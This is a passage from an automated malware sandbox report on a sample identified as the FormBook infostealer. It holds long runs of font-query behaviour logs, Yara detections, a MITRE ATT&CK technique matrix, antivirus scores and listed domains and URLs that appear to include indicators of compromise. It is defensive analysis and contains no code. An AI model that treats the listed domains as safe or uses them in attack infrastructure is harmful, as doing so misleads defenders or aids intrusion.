Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
JFBlvEr5H9.exe	20%	Virustotal		Browse
JFBlvEr5H9.exe	22%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
JFBlvEr5H9.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.JFBlvEr5H9.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
advancedaccessapplications.com	0%	Virustotal		Browse
www.pyithuhluttaw.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.sajatypeworks.com2	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cnX	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
www.adultpeace.com/p2io/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
